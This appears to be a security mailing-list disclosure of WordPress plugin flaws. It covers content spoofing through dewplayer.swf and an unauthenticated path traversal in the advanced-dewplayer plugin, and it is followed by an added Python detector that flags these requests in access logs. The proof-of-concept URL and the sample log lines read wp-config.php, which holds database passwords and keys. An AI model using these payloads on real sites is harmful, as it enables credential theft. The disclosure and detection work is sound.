While verifying (lunch break) the dewplayer issues announced here
http://seclists.org/fulldisclosure/2013/Dec/209 I noticed that the same
component is also used by other plugins. Please notify me in case this list does
not care about WordPress plugin security overall, as it can make our list less
readable. Only listing active (non-disabled) plugins.
Q: Do content spoofing issues normally get a CVE, as the risk is probably
minimal?
Assigning one CVE for a vulnerability in different software components, e.g.
libraries used in WordPress plugins, makes it very difficult to coordinate
updates with end users. Examples:
http://osvdb.org/83413
http://osvdb.org/90374
I hope to get new CVEs for the issues below.
#1
Plugin: flash-player-widget
Version tested: 1.3
Type: CAPEC-148: Content Spoofing
PoC: http://example.com/wp-content/plugins/flash-player-widget/dewplayer.swf?mp3=http://example.mp3
SHA1: 97a4b45212be83bf8dc5dd7a289a3decac7889ab
Notes:
- No XSS vector by using ?xml=xss.xml
- No full path disclosure
#2
Plugin: advanced-dewplayer
Version tested: 1.2
Type: CAPEC-148: Content Spoofing
PoC: http://example.com/wp-content/plugins/advanced-dewplayer/dewplayer.swf?mp3=http://example.mp3
SHA1: 2947cc06ab1bd6e8af2229511e6797f9709ca615 (same as
dewplayer-flash-mp3-player in the announcement)
Notes:
- No XSS vector by using ?xml=xss.xml
- No full path disclosure
Also, during the process I noticed that there is an additional security vulnerability.
Details below.
#3
Plugin: advanced-dewplayer
Version tested: 1.2
Type: Information Disclosure / CAPEC-118: Data Leakage Attacks
PoC:
http://example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
Impact: The file wp-config.php contains database passwords, authentication
keys/salts, etc. Does not need authentication.
General note: No time to make a proper analysis, so there are probably more issues :)
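Added example (not part of the original post): a small log-review helper that flags the two request patterns reported above, the dew_file path traversal against admin-panel/download-file.php and a remote mp3= source handed to dewplayer.swf, in Apache-style access log lines. The log lines are constructed for illustration, and the URL-decoding loop is an assumption about how encoded variants should be normalised before matching.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2013:12:01:02 +0000] "GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1" 200 3120
203.0.113.5 - - [10/Dec/2013:12:01:09 +0000] "GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3120
198.51.100.7 - - [10/Dec/2013:12:02:00 +0000] "GET /wp-content/plugins/flash-player-widget/dewplayer.swf?mp3=http://example.mp3 HTTP/1.1" 200 7890
192.0.2.9 - - [10/Dec/2013:12:03:00 +0000] "GET /wp-content/plugins/advanced-dewplayer/dewplayer.swf?mp3=/wp-content/uploads/track.mp3 HTTP/1.1" 200 7890
192.0.2.9 - - [10/Dec/2013:12:03:05 +0000] "GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=track.mp3 HTTP/1.1" 200 44000
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    qs = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith("/admin-panel/download-file.php"):
        for raw in qs.get("dew_file", []):
            val = raw
            for _ in range(3):          # assumption: unwrap double/triple encoding
                val = unquote(val)
            norm = val.replace("\\", "/")
            # Any parent-directory step or absolute path escapes the plugin directory
            if "../" in norm or norm.startswith("/"):
                return "path-traversal:dew_file"
    if path.endswith("/dewplayer.swf"):
        for raw in qs.get("mp3", []):
            val = unquote(raw)
            # A scheme or protocol-relative prefix means the player loads third-party content
            if re.match(r"^[a-z][a-z0-9+.-]*://", val, re.I) or val.startswith("//"):
                return "content-spoofing:remote-mp3"
    return None

def scan(log_text):
    """Parse each access log line and collect (client ip, finding, status) tuples."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        label = classify(m["target"])
        if label:
            findings.append((m["ip"], label, m["status"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```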